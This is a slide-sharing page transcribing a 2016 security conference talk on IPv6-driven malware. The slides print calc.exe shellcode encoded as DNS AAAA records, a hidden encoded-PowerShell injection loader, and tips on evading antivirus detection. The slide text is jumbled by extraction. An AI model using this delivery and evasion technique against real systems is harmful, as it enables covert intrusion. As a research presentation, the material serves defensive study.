hacking attacks
play

Hacking Attacks The power of IPv6 driven malware m-r Mane - PowerPoint PPT Presentation

Dec 28, 2022 •158 likes •297 views

Hacking Attacks The power of IPv6 driven malware m-r Mane Piperevski IT Security Researcher Ethical Hacker mane@piperevski.com Piperevski & Associates Skopje, Macedonia What's your favorite Malware? Who we are? A. Popup

  1. Hacking Attacks The power of IPv6 driven malware m-r Mane Piperevski IT Security Researcher – Ethical Hacker mane@piperevski.com Piperevski & Associates – Skopje, Macedonia

  2. What's your favorite Malware? Who we are? A. Popup advertisements B. Banking malware C. Spy malware D. Porn malware E. Stealth malware F. My malware or your malware BalCCon2k16, Novi Sad, Serbia 2016

  3. Which statement is False? Who we are? A. I didn't had any malware before I used marketing CD/DVD media B. I didn't had any malware before I used web browser C. I didn't had any malware before I used USM memory stick D. I didn't had any malware before I used Computer E. I didn't had any malware before I went to BalCCon2k16 F. I didn't had any malware before I connect my Computer at Hotel Wi-Fi BalCCon2k16, Novi Sad, Serbia 2016

  4. Malware News Who we are? • Complex program code with mutation engine • Artificial intelligence (traps) to fight against reverse engineers • Malware covert communication with protocols exploitation • OTM - One Time Malware • Malware as Service … Commercial Malware BalCCon2k16, Novi Sad, Serbia 2016

  5. My Malware Before Who we are? • Used XOR to make shellcode undetectable for signature based • Use packer to make the malware powerful - MSI format • Since 2010 - always send to test it at AV Test portals like Virus Total • Until 2015 - 100% stealth in eyes of AV BalCCon2k16, Novi Sad, Serbia 2016

  6. My Malware Now Who we are? • Malware covert communication with IPv6 protocol • Exploiting DNS AAAA resource records as shellcode payload • Use of PowerShell as execution method • Since 2016 - never send to test it at AV Test portals like Virus Total • Keep it simple and successful BalCCon2k16, Novi Sad, Serbia 2016

  7. My Malware Now – Build Structure Who we are? • Exploiting DNS AAAA resource records as payload 2001:ODB8:AC10:FE01:ODB8:AC10:FE01:FD11 2001ODB8AC10FE01ODB8AC10FE01FD11 2001odb8ac10fe01odb8ac10fe01fd11 \x20\x01\xod\xb8\xac\x10\xfe\x01\xod\xb8\xac\x10\xfe\x01\xfd\x11 BalCCon2k16, Novi Sad, Serbia 2016

  8. My Malware Now – Build Structure Who we are? • Exploiting DNS AAAA resource records as payload Exec calc.exe shellcode 16 IPv6 Addresses dbc3:d974:24f4:bee8:5a27:135f:31c9:b133 \xdb\xc3\xd9\x74\x24\xf4\xbe\xe8\x5a\x27\x13\x5f\x31\xc9\xb1\x33\x 3177:17:83c:7040:39f:49c5:e6a3:86 31\x77\x17\x83\xc7\x04\x03\x9f\x49\xc5\xe6\xa3\x86\x80\x09\x5b\x57 8009:5b57:f3:80be:6621:f6cb:dbf5:7c99 \xf3\x80\xbe\x66\x21\xf6\xcb\xdb\xf5\x7c\x99\xd7\x7e\xd0\x09\x63\xf d77e:d009:63f2:fd3e:c4b9:db71:d50f:e4dd 2\xfd\x3e\xc4\xb9\xdb\x71\xd5\x0f\xe4\xdd\x15\x11\x98\x1f\x4a\xf1\x 1511:981f:4af1:a1:d09:ff0e:60c:6f: a1\xd0\x9f\xf0\xe6\x0c\x6f\xa0\xbf\x5b\xc2\x55\xcb\x19\xdf\x54\x1b\x a0bf:5bc2:55cb:19df:54:1b16:5f2f:1ee8 16\x5f\x2f\x1e\xe8\x14\x85\x21\x38\x84\x92\x6a\xa0\xae\xfd\x4a\xd1\ 1485:2138:8492:6a:a0a:efd:4ad1:631e: x63\x1e\xb6\x98\x08\xd5\x4c\x1b\xd9\x27\xac\x2a\x25\xeb\x93\x83\x b6:9808:d5:4c1b:d927:ac2a:25eb:9383 a8\xf5\xd4\x23\x53\x80\x2e\x50\xee\x93\xf4\x2b\x34\x11\xe9\x8b\xbf a8f5:d423:53:802e:50ee:93:f42b:3411 \x81\xc9\x2a\x13\x57\x99\x20\xd8\x13\xc5\x24\xdf\xf0\x7d\x50\x54\xf e98b:bf81:c92a:1357:99:20d8:13:c524 7\x51\xd1\x2e\xdc\x75\xba\xf5\x7d\x2f\x66\x5b\x81\x2f\xce\x04\x27\x df:f07d:505:4f7:51d1:2edc:75ba:f57d 3b\xfc\x51\x51\x66\x6a\xa7\xd3\x1c\xd3\xa7\xeb\x1e\x73\xc0\xda\x95 2f66:5b81:2f:ce04:27:3bfc:5151:666a \x1c\x97\xe2\x7f\x59\x67\xa9\x22\xcb\xe0\x74\xb7\x4e\x6d\x87\x6d\x a7d3:1cd3:a7eb:1e73:c0da:951c:97e2:7f59 8c\x88\x04\x84\x6c\x6f\x14\xed\x69\x2b\x92\x1d\x03\x24\x77\x22\xb0 67a9:22c:be07:4:b74e:6d87:6d8c:8804 \x45\x52\x41\x57\xd6\x3e\xa8\xf2\x5e\xa4\xb4 846c:6f14:ed69:2b92:1d03:2477:22:b045 52:4157:d63e:a8f2:5ea4:b4 BalCCon2k16, Novi Sad, Serbia 2016

  9. My Malware Now – Build Structure Who we are? First Part - Exploiting DNS AAAA resource records as payload Malware Base AAAA DNS Records 1 dbc3:d974:24f4:bee8:5a27:135f:31c9:b133 Send DNS queries for AAAA records 3177:17:83c:7040:39f:49c5:e6a3:86 8009:5b57:f3:80be:6621:f6cb:dbf5:7c99 d77e:d009:63f2:fd3e:c4b9:db71:d50f:e4dd 1511:981f:4af1:a1:d09:ff0e:60c:6f: a0bf:5bc2:55cb:19df:54:1b16:5f2f:1ee8 2 Receive IPv6 addresses 1485:2138:8492:6a:a0a:efd:4ad1:631e: b6:9808:d5:4c1b:d927:ac2a:25eb:9383 a8f5:d423:53:802e:50ee:93:f42b:3411 e98b:bf81:c92a:1357:99:20d8:13:c524 df:f07d:505:4f7:51d1:2edc:75ba:f57d 3 2f66:5b81:2f:ce04:27:3bfc:5151:666a Convert IPv6 addresses to shellcode a7d3:1cd3:a7eb:1e73:c0da:951c:97e2:7f59 \xdb\xc3\xd9\x74\x24\xf4\xbe\xe8\x5a\x27\x13\x5f\x31\xc9\xb1\x33\x 67a9:22c:be07:4:b74e:6d87:6d8c:8804 31\x77\x17\x83\xc7\x04\x03\x9f\x49\xc5\xe6\xa3\x86\x80\x09\x5b\x57 846c:6f14:ed69:2b92:1d03:2477:22:b045 \xf3\x80\xbe\x66\x21\xf6\xcb\xdb\xf5\x7c\x99\xd7\x7e\xd0\x09\x63\xf 52:4157:d63e:a8f2:5ea4:b4 2\xfd\x3e\xc4\xb9\xdb\x71\xd5\x0f\xe4\xdd\x15\x11\x98\x1f\x4a\xf1\x a1\xd0\x9f\xf0\xe6\x0c\x6f\xa0\xbf\x5b\xc2\x55\xcb\x19\xdf\x54\x1b\x 16\x5f\x2f\x1e\xe8\x14\x85\x21\x38\x84\x92\x6a\xa0\xae\xfd\x4a\xd1\ x63\x1e\xb6\x98\x08\xd5\x4c\x1b\xd9\x27\xac\x2a\x25\xeb\x93\x83\x a8\xf5\xd4\x23\x53\x80\x2e\x50\xee\x93\xf4\x2b\x34\x11\xe9\x8b\xbf \x81\xc9\x2a\x13\x57\x99\x20\xd8\x13\xc5\x24\xdf\xf0\x7d\x50\x54\xf 7\x51\xd1\x2e\xdc\x75\xba\xf5\x7d\x2f\x66\x5b\x81\x2f\xce\x04\x27\x 3b\xfc\x51\x51\x66\x6a\xa7\xd3\x1c\xd3\xa7\xeb\x1e\x73\xc0\xda\x95 \x1c\x97\xe2\x7f\x59\x67\xa9\x22\xcb\xe0\x74\xb7\x4e\x6d\x87\x6d\x 8c\x88\x04\x84\x6c\x6f\x14\xed\x69\x2b\x92\x1d\x03\x24\x77\x22\xb0 \x45\x52\x41\x57\xd6\x3e\xa8\xf2\x5e\xa4\xb4 BalCCon2k16, Novi Sad, Serbia 2016

  10. My Malware Now – Build Structure Who we are? Second Part - Use of PowerShell as execution method Retrieved shellcode trough IPv6 PowerShell Command powershell -noprofile -windowstyle hidden - \xdb\xc3\xd9\x74\x24\xf4\xbe\xe8\x5a\x27\x13\x5f\x31\xc9\xb1\x33\x noninteractive -EncodedCommand JAAxAC 31\x77\x17\x83\xc7\x04\x03\x9f\x49\xc5\xe6\xa3\x86\x80\x09\x5b\x57 Convert shellcode for AAPQAgACcAJABjACAAPQAgACcAJwBbAEQAbABs \xf3\x80\xbe\x66\x21\xf6\xcb\xdb\xf5\x7c\x99\xd7\x7e\xd0\x09\x63\xf PowerShell AEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAb 2\xfd\x3e\xc4\xb9\xdb\x71\xd5\x0f\xe4\xdd\x15\x11\x98\x1f\x4a\xf1\x Injection AAzAD a1\xd0\x9f\xf0\xe6\x0c\x6f\xa0\xbf\x5b\xc2\x55\xcb\x19\xdf\x54\x1b\x IALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwA 16\x5f\x2f\x1e\xe8\x14\x85\x21\x38\x84\x92\x6a\xa0\xae\xfd\x4a\xd1\ gAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG x63\x1e\xb6\x98\x08\xd5\x4c\x1b\xd9\x27\xac\x2a\x25\xeb\x93\x83\x 4AIABJAG a8\xf5\xd4\x23\x53\x80\x2e\x50\xee\x93\xf4\x2b\x34\x11\xe9\x8b\xbf 4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQ \x81\xc9\x2a\x13\x57\x99\x20\xd8\x13\xc5\x24\xdf\xf0\x7d\x50\x54\xf 1 QBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAH 7\x51\xd1\x2e\xdc\x75\xba\xf5\x7d\x2f\x66\x5b\x81\x2f\xce\x04\x27\x AAQQBkAG 3b\xfc\x51\x51\x66\x6a\xa7\xd3\x1c\xd3\xa7\xeb\x1e\x73\xc0\xda\x95 …. \x1c\x97\xe2\x7f\x59\x67\xa9\x22\xcb\xe0\x74\xb7\x4e\x6d\x87\x6d\x …. 8c\x88\x04\x84\x6c\x6f\x14\xed\x69\x2b\x92\x1d\x03\x24\x77\x22\xb0 …. \x45\x52\x41\x57\xd6\x3e\xa8\xf2\x5e\xa4\xb4 …. Execute and open …. calc.exe UAcgBhAG MAdABpAHYAZQAgAC0ARQBuAGMAbwBkAGUAZ ABDAG8AbQBtAGEAbgBkACIAOwBpAGUAeAAgA CIAJgAgAH AAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAGMAbQ 2 BkACAAJABnAG8AYQB0ACIAOwB9AA== BalCCon2k16, Novi Sad, Serbia 2016

  11. My Malware Now DEMO BalCCon2k16, Novi Sad, Serbia 2016

  12. The power of IPv6 driven malware Q&A BalCCon2k16, Novi Sad, Serbia 2016

  13. The power of IPv6 driven malware Thank You! m-r Mane Piperevski mane@piperevski.com github.com/piperevski/IPv6Malware BalCCon2k16, Novi Sad, Serbia 2016

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Future Banking and Financial Attacks Konstantinos Karagiannis Director, Ethical Hacking, BT

Future Banking and Financial Attacks Konstantinos Karagiannis Director, Ethical Hacking, BT

Future Banking and Financial Attacks Konstantinos Karagiannis Director, Ethical Hacking, BT Advise Assure 2 Agenda/topics covered Threat overview Advanced User Enumeration and DDoS Trading Turret and Timing Attacks Internal and External User

365 views • 35 slides
Novel Hardware-based Attacks Jason Zheng Aditya Joshi Introduction Direct hardware hacking is

Novel Hardware-based Attacks Jason Zheng Aditya Joshi Introduction Direct hardware hacking is

Novel Hardware-based Attacks Jason Zheng Aditya Joshi Introduction Direct hardware hacking is as old as the trade of hacking Common Characteristics: Physical access (at least within transmission range of EM/Accoustic signals). Seemingly

252 views • 22 slides
Hacking in C hic 1 About this course: topics & goals Standard ways in which software

Hacking in C hic 1 About this course: topics & goals Standard ways in which software

Hacking in C hic 1 About this course: topics & goals Standard ways in which software can be exploited understanding how such attacks work understanding what makes these attacks possible doing some attacks in practice

1.17k views • 16 slides
FIT5124 Advanced Topics in Security Lecture 7: Hacking Techniques I Side Channel Attacks Ron

FIT5124 Advanced Topics in Security Lecture 7: Hacking Techniques I Side Channel Attacks Ron

FIT5124 Advanced Topics in Security Lecture 7: Hacking Techniques I Side Channel Attacks Ron Steinfeld Clayton School of IT Monash University April 2015 Ron Steinfeld FIT5124 Advanced Topics in SecurityLecture 7: Hacking Techniques I

1.11k views • 25 slides
Table of Contents Introduction Hacking Web Sites Examples of Attacks Broken

Table of Contents Introduction Hacking Web Sites Examples of Attacks Broken

Table of Contents Introduction Hacking Web Sites Examples of Attacks Broken Authentication Brute Force Session Spotting Emmanuel Benoist Session Fixation Attack Session Hijacking Fall Term 2020/2021 Session Expiration

638 views • 10 slides
ETHICAL HACKING Daniel Cloherty CAN HACKING BE ETHICAL? What makes hacking ethical?

ETHICAL HACKING Daniel Cloherty CAN HACKING BE ETHICAL? What makes hacking ethical?

ETHICAL HACKING Daniel Cloherty CAN HACKING BE ETHICAL? What makes hacking ethical? Legality VS Ethics State Sanctioned hacking BLACK HAT - Stereotypical Hacker -Stealing data for personal gain -Obviously not ethical -Using

1.17k views • 10 slides
ACAMS Cybersecurity Risk We All Face Jerry Craft| August 2017 About Your Speaker About Nth

ACAMS Cybersecurity Risk We All Face Jerry Craft| August 2017 About Your Speaker About Nth

ACAMS Cybersecurity Risk We All Face Jerry Craft| August 2017 About Your Speaker About Nth Generation Computing Ransomware Attacks & Extortion Hacking 101 Website Hacking 101 Phishing, Smishing and Lying Nation State Attacks

924 views • 39 slides
Hacking in the Blind: (Almost) Invisible Runtime User Interface Attacks Luka Malisa , Kari

Hacking in the Blind: (Almost) Invisible Runtime User Interface Attacks Luka Malisa , Kari

Hacking in the Blind: (Almost) Invisible Runtime User Interface Attacks Luka Malisa , Kari Kostiainen, Thomas Knell, David Sommer, and Srdjan Capkun {firstname.lastname}@inf.ethz.ch knellt@student.ethz.ch User Interfaces Consists of input

726 views • 21 slides
Hacking Reinforcement Learning Guillem Duran Ballester Guillemdb @Miau_DB A tale about hacking

Hacking Reinforcement Learning Guillem Duran Ballester Guillemdb @Miau_DB A tale about hacking

Hacking Reinforcement Learning Guillem Duran Ballester Guillemdb @Miau_DB A tale about hacking AI-Corp Hacking RL 1. Information gathering 2. Scanning 3. Exploitation & privilege escalation 4. Maintaining access & covering tracks

960 views • 62 slides
VoIP Phreaking Introduction to SIP Hacking Hendrik Scholz hscholz@raisdorf.net

VoIP Phreaking Introduction to SIP Hacking Hendrik Scholz hscholz@raisdorf.net

VoIP Phreaking Introduction to SIP Hacking Hendrik Scholz hscholz@raisdorf.net http://www.wormulon.net/ 22C3, 2005-12-27 Berlin, Germany Agenda What is Voice Over IP? Infrastucture Protocols SIP attacks Conclusion VoIP

532 views • 24 slides
Hands-On Ethical Hacking and Network Defense Second Edition - Chapter 3 Network and Computer

Hands-On Ethical Hacking and Network Defense Second Edition - Chapter 3 Network and Computer

Hands-On Ethical Hacking and Network Defense Second Edition - Chapter 3 Network and Computer Attacks Objectives After reading this chapter and completing the exercises , you will be able to: Describe the different types of malicious

84 views • 7 slides
Secure Programming Skoudis, Tom Liston, Prentice Hall Hacking Exposed 7: Network Security

Secure Programming Skoudis, Tom Liston, Prentice Hall Hacking Exposed 7: Network Security

17.2.2016 Course material 2 Counter Hack Reloaded:A Step by Step Guide to Computer Attacks and Effective Defenses, Edward Secure Programming Skoudis, Tom Liston, Prentice Hall Hacking Exposed 7: Network Security Secrets &

410 views • 4 slides
Hacking SecondLife Michael Thumann Hacking SecondLife by Michael Thumann 2/24/08 1

Hacking SecondLife Michael Thumann Hacking SecondLife by Michael Thumann 2/24/08 1

Hacking SecondLife Michael Thumann Hacking SecondLife by Michael Thumann 2/24/08 1 Disclaimer Everything you are about to see, hear, read and experience is for educational purposes only. No warranties or guarantees implied or

692 views • 47 slides
Drone Hacking Basics Intro to UAS Architectures, Attack Vectors and RF Hacking Matt Koskela June

Drone Hacking Basics Intro to UAS Architectures, Attack Vectors and RF Hacking Matt Koskela June

Drone Hacking Basics Intro to UAS Architectures, Attack Vectors and RF Hacking Matt Koskela June 15, 2017 Outline Drone Architectures RF Basics Information Gathering RF Hacking Tools Exploits & Demos Q&A Why? Wrights Law

485 views • 27 slides
RFID attacks and proxmark hands-on @ KirilsSolovjovs +4fd9 About me Programming sysad

RFID attacks and proxmark hands-on @ KirilsSolovjovs +4fd9 About me Programming sysad

RFID attacks and proxmark hands-on @ KirilsSolovjovs +4fd9 About me Programming sysad networking IT security for the past 10+ y Owner and Lead Researcher at Possible Security Hacking and breaking things

946 views • 19 slides
Hacking, Hacktivism, and Counterhacking April 22, 2015 Outline Vocabulary Hacking motivated by

Hacking, Hacktivism, and Counterhacking April 22, 2015 Outline Vocabulary Hacking motivated by

Hacking, Hacktivism, and Counterhacking April 22, 2015 Outline Vocabulary Hacking motivated by benign purposes Hacktivism Counterhacking Case Studies Site defacement Network exploration / Port scanning / SQL injection / . . .

522 views • 18 slides
Network Resilience Sanjeev Goyal Christs College University of Cambridge Latsis Symposium

Network Resilience Sanjeev Goyal Christs College University of Cambridge Latsis Symposium

Network Resilience Sanjeev Goyal Christs College University of Cambridge Latsis Symposium 2012 Zurich Franks `RESEARCH QUESTION Can economics as a scientific discipline that must extricate itself from its current conceptual crisis,

498 views • 34 slides
Killzones AI: dynamic procedural combat tactics Remco Straatman Guerrilla Games, Amsterdam,

Killzones AI: dynamic procedural combat tactics Remco Straatman Guerrilla Games, Amsterdam,

Killzones AI: dynamic procedural combat tactics Remco Straatman Guerrilla Games, Amsterdam, the Netherlands, remco.straatman@guerrilla-games.com William van der Sterren CGF-AI, Veldhoven, the Netherlands, william.van.der.sterren@cgf-ai.com

412 views • 17 slides
Outline Malicious Code Introduction CS 239 Viruses Trojan horses Security for

Outline Malicious Code Introduction CS 239 Viruses Trojan horses Security for

Outline Malicious Code Introduction CS 239 Viruses Trojan horses Security for Networks and Trap doors System Software Logic bombs May 12, 2002 Worms Examples Lecture 11 Lecture 11 Page 1 Page 2 CS 239,

234 views • 12 slides
Review 1 logistics CHALLENGE due before in-class fjnal Final Exam Rice 130 (this room)

Review 1 logistics CHALLENGE due before in-class fjnal Final Exam Rice 130 (this room)

Review 1 logistics CHALLENGE due before in-class fjnal Final Exam Rice 130 (this room) 2PM 11 May 90 minutes target length similar to midterms more focus on post-last-midterm 2 late submissions not accepted without prior

1.92k views • 151 slides
Qualitative and Quantitative Evaluation of Software Packers Mar a Baz guez , Jos us,

Qualitative and Quantitative Evaluation of Software Packers Mar a Baz guez , Jos us,

Qualitative and Quantitative Evaluation of Software Packers Mar a Baz guez , Jos us, Ricardo J. Rodr e Merseguer All wrongs reversed rjrodriguez@unizar.es @RicardoJRdez www.ricardojrodriguez.es Department of Computer

505 views • 47 slides
Information Systems Asset Protection: Monitoring SYSTEM ATTACKS Kevin Henry CISA CISM CRISC

Information Systems Asset Protection: Monitoring SYSTEM ATTACKS Kevin Henry CISA CISM CRISC

Information Systems Asset Protection: Monitoring SYSTEM ATTACKS Kevin Henry CISA CISM CRISC CISSP Kevinmhenry@msn.com Asset Protection Monitoring Agenda: Security Testing Investigating Systems Attacks and Monitoring Incidents

813 views • 35 slides
Reversible Digital Watermarking Chang-Tsun Li Department of Computer Science University of

Reversible Digital Watermarking Chang-Tsun Li Department of Computer Science University of

Reversible Digital Watermarking Chang-Tsun Li Department of Computer Science University of Warwick Multimedia Security and Forensics 1 Reversible Watermarking Based on Difference Expansion (DE) In some medical, legal and military

827 views • 33 slides
Image Forensics and Steganalysis (Hans) Georg Schaathun Department of Computing University of

Image Forensics and Steganalysis (Hans) Georg Schaathun Department of Computing University of

Image Forensics and Steganalysis (Hans) Georg Schaathun Department of Computing University of Surrey 26 June 2009 (Hans) Georg Schaathun Image Forensics and Steganalysis 26 June 2009 1 / 47 Outline Examples 1 Tampering Different

1.15k views • 86 slides

More recommend